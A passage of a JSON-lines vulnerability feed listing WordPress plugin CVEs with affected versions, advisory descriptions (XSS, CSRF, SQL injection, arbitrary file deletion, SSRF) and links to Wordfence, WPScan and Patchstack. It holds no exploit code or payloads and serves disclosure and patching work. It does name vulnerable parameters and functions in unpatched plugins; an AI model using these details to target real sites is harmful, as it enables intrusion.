replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d0ecffe-8543-4d82-a1cc-f2474499f373?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d0ecffe-8543-4d82-a1cc-f2474499f373?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-scss-compiler\\\/trunk\\\/admin\\\/class-hm-wp-scss-admin.php#L384\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-scss-compiler\\\/trunk\\\/admin\\\/class-hm-wp-scss-admin.php#L384\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9655","slug":"kadence-blocks","versionImpact":"3.3.1","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon widget in all versions up to, and including, 6.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4027138-9a8a-4602-90fd-19e9f7c45bb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4027138-9a8a-4602-90fd-19e9f7c45bb4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/assets\\\/js\\\/kb-tippy.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/assets\\\/js\\\/kb-tippy.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.kadencewp.com\\\/kadence-blocks\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.kadencewp.com\\\/kadence-blocks\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kadence-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kadence-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fkadence-blocks&old=3162912&new_path=%2Fkadence-blocks&new=3170375&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fkadence-blocks&old=3162912&new_path=%2Fkadence-blocks&new=3170375&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11204","slug":"forumwp","versionImpact":"2.1.2","description":"The ForumWP \u2013 Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 2.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.1\\\/includes\\\/admin\\\/class-columns.php#L313\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.1\\\/includes\\\/admin\\\/class-columns.php#L313\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/forumwp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/forumwp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd11abe3-8307-492b-beef-242fb21a4206?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd11abe3-8307-492b-beef-242fb21a4206?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12554","slug":"peters-custom-anti-spam-image","versionImpact":"3.2.3","description":"The Peter\u2019s Custom Anti-Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.3. This is due to missing nonce validation on the cas_register_post() function. This makes it possible for unauthenticated attackers to blacklist emails via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peters-custom-anti-spam-image\\\/trunk\\\/custom_anti_spam.php#L1081\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peters-custom-anti-spam-image\\\/trunk\\\/custom_anti_spam.php#L1081\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208894\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208894\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peters-custom-anti-spam-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peters-custom-anti-spam-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c52ca89-4f13-41da-bc10-80d212c6219c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c52ca89-4f13-41da-bc10-80d212c6219c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12885","slug":"connections","versionImpact":"10.4.66","description":"The Connections Business Directory plugin for WordPress is vulnerable to arbitrary directory deletion due to insufficient file path validation when deleting a connections image directory in all versions up to, and including, 10.4.66. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary folders on the server and all their content.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/connections\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/connections\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25e0c269-55c2-49f0-96bb-ae2696e2cea8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25e0c269-55c2-49f0-96bb-ae2696e2cea8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12410","slug":"front-end-only-users","versionImpact":"3.2.32","description":"The Front End Users plugin for WordPress is vulnerable to SQL Injection via the 'UserSearchField' parameter in all versions up to, and including, 3.2.32 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/975ddadd-12f8-4ace-9c1a-489114a2da6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/975ddadd-12f8-4ace-9c1a-489114a2da6a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10634","slug":"nokaut-offers-box","versionImpact":"1.4.0","description":"The Nokaut Offers Box WordPress plugin through 1.4.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin reset the Nokaut Offers Box WordPress plugin through 1.4.0 via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97de2ca3-ee64-480b-a5b0-7549533c2936\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97de2ca3-ee64-480b-a5b0-7549533c2936\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5841","slug":"acf-onyx-poll","versionImpact":"1.1.9","description":"The ACF Onyx Poll plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class\u2019 parameter in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-onyx-poll\\\/tags\\\/1.1.8\\\/onyx-poll.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-onyx-poll\\\/tags\\\/1.1.8\\\/onyx-poll.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-onyx-poll\\\/tags\\\/1.2.0\\\/onyx-poll.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-onyx-poll\\\/tags\\\/1.2.0\\\/onyx-poll.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/acf-onyx-poll\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/acf-onyx-poll\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f4302f8-e9da-436f-9b4b-d01d3dbe9f31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f4302f8-e9da-436f-9b4b-d01d3dbe9f31?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7778","slug":"icons-factory","versionImpact":"1.6.12","description":"The Icons Factory plugin for WordPress is vulnerable to Arbitrary File Deletion due to insufficient authorization and improper path validation within the delete_files() function in all versions up to, and including, 1.6.12. This makes it possible for unauthenticated attackers to to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/icons-factory\\\/tags\\\/1.6.12\\\/icons-factory.php#L1330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/icons-factory\\\/tags\\\/1.6.12\\\/icons-factory.php#L1330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/icons-factory\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/icons-factory\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24f31bbf-883f-4903-847a-7bfc3e45654c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24f31bbf-883f-4903-847a-7bfc3e45654c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4303","slug":"wp-limit-login-attempts","versionImpact":"2.6.4","description":"The WP Limit Login Attempts WordPress plugin through 2.6.4 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass IP-based restrictions on login forms.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8428a5e1-dbef-4516-983f-f95605c6dd09\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8428a5e1-dbef-4516-983f-f95605c6dd09\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-38468","slug":"nextgen-gallery","versionImpact":"3.28","description":"Cross-Site Request Forgery (CSRF) vulnerability in Imagely WordPress Gallery Plugin \u2013 NextGEN Gallery plugin <= 3.28 leading to thumbnail alteration.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/nextgen-gallery\\\/wordpress-wordpress-gallery-plugin-nextgen-gallery-plugin-3-28-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/nextgen-gallery\\\/wordpress-wordpress-gallery-plugin-nextgen-gallery-plugin-3-28-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36720","slug":"kali-forms","versionImpact":"2.1.1.","description":"The Kali Forms plugin for WordPress is vulnerable to Authenticated Options Change in versions up to, and including, 2.1.1. This is due to the update_option lacking proper authentication checks. This makes it possible for any authenticated attacker to change (or delete) the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ed8e24d-6bd0-4638-9031-997ce2228fad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ed8e24d-6bd0-4638-9031-997ce2228fad?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kali-forms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kali-forms\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-8934","slug":"google-site-kit","versionImpact":"1.8.0","description":"The Site Kit by Google plugin for WordPress is vulnerable to Sensitive Information Disclosure in versions up to, and including, 1.8.0 This is due to the lack of capability checks on the admin_enqueue_scripts action which displays the connection key. This makes it possible for authenticated attackers with any level of access obtaining owner access to a site in the Google Search Console. We recommend upgrading to V1.8.1 or above.\n","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/google-site-kit\\\/site-kit-by-google-171-sensitive-information-disclosure\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/google-site-kit\\\/site-kit-by-google-171-sensitive-information-disclosure\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2172","slug":"badgeos","versionImpact":"3.7.1.6","description":"The BadgeOS plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.7.1.6. This is due to improper validation and authorization checks within the badgeos_update_steps_ajax_handler, badgeos_update_award_steps_ajax_handler, badgeos_update_deduct_steps_ajax_handler, and badgeos_update_ranks_req_steps_ajax_handler functions. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to overwrite arbitrary post titles.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dae8e82-e252-48d9-ae1f-62acfcd17e2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dae8e82-e252-48d9-ae1f-62acfcd17e2b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/award-steps-ui.php#L397\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/award-steps-ui.php#L397\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/deduct-steps-ui.php#L454\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/deduct-steps-ui.php#L454\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ranks\\\/rank-steps-ui.php#L388\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ranks\\\/rank-steps-ui.php#L388\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/steps-ui.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/steps-ui.php#L396\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4628","slug":"ladipage","versionImpact":"4.4","description":"The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the ladiflow_save_hook() function in versions up to, and including, 4.4. This makes it possible for unauthenticated attackers to update the 'ladiflow_hook_configs' option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be418fa-f1cf-4aaf-bc94-c8e04186a54b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be418fa-f1cf-4aaf-bc94-c8e04186a54b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1983\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1983\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34418","slug":"wpcs-wp-custom-search","versionImpact":"1.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tech9logy Creators WPCS ( WordPress Custom Search ) allows Stored XSS.This issue affects WPCS ( WordPress Custom Search ): from n\/a through 1.1.\n\n","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpcs-wp-custom-search\\\/wordpress-wpcs-wordpress-custom-search-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpcs-wp-custom-search\\\/wordpress-wpcs-wordpress-custom-search-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3978","slug":"wp-jitsi-shortcodes","versionImpact":"0.1","description":"The WordPress Jitsi Shortcode WordPress plugin through 0.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9f47d11-47ac-4998-a82a-dc2f3b0decdf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9f47d11-47ac-4998-a82a-dc2f3b0decdf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5479","slug":"easy-pixels-by-jevnet","versionImpact":"2.13","description":"The Easy Pixels plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 2.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a397025-ada7-4a59-80b9-5a778ea27776?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a397025-ada7-4a59-80b9-5a778ea27776?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/admin\\\/easyPixelsAdmin.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/admin\\\/easyPixelsAdmin.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/easyPixels.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/easyPixels.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/classes\\\/easy-pixels.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pixels-by-jevnet\\\/trunk\\\/classes\\\/easy-pixels.php#L87\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11365","slug":"security-force","versionImpact":"1.1.6","description":"The Crypto and DeFi Widgets \u2013 Web3 Cryptocurrency Shortcodes plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-force\\\/trunk\\\/lib\\\/class.settings-api.php#L2460\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-force\\\/trunk\\\/lib\\\/class.settings-api.php#L2460\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-force\\\/trunk\\\/lib\\\/class.settings-api.php#L2497\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-force\\\/trunk\\\/lib\\\/class.settings-api.php#L2497\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dead051c-f28f-4859-b0ba-b27a8d6c9335?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dead051c-f28f-4859-b0ba-b27a8d6c9335?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12454","slug":"slicewp","versionImpact":"1.1.23","description":"The Affiliate Program Suite \u2014 SliceWP Affiliates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.23. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.23\\\/includes\\\/admin\\\/settings\\\/views\\\/view-settings-tab-general.php#L437\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.23\\\/includes\\\/admin\\\/settings\\\/views\\\/view-settings-tab-general.php#L437\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.23\\\/includes\\\/admin\\\/settings\\\/views\\\/view-settings-tab-general.php#L451\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.23\\\/includes\\\/admin\\\/settings\\\/views\\\/view-settings-tab-general.php#L451\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/trunk\\\/includes\\\/admin\\\/settings\\\/functions-actions-settings.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/trunk\\\/includes\\\/admin\\\/settings\\\/functions-actions-settings.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207576\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207576\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slicewp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slicewp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73aad911-531b-4118-9d39-27cbae75db01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73aad911-531b-4118-9d39-27cbae75db01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12826","slug":"personalize-woocommerce-cart-page","versionImpact":"3.5","description":"The GoHero Store Customizer for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wooh_action_settings_save_frontend() function in all versions up to, and including, 3.5. This makes it possible for unauthenticated attackers to update limited plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/personalize-woocommerce-cart-page\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/personalize-woocommerce-cart-page\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f65ee908-004f-4526-aeca-41b36522bb30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f65ee908-004f-4526-aeca-41b36522bb30?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13905","slug":"onestore-sites","versionImpact":"0.1.1","description":"The OneStore Sites plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 0.1.1 via the class-export.php file. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onestore-sites\\\/trunk\\\/classess\\\/class-export.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/onestore-sites\\\/trunk\\\/classess\\\/class-export.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2c70d5f-beb3-480e-8ea8-c3ab01ce5a20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2c70d5f-beb3-480e-8ea8-c3ab01ce5a20?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10632","slug":"nokaut-offers-box","versionImpact":"1.4.0","description":"The Nokaut Offers Box WordPress plugin through 1.4.0 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17afba70-f213-47f6-aea2-59288ca92549\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17afba70-f213-47f6-aea2-59288ca92549\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
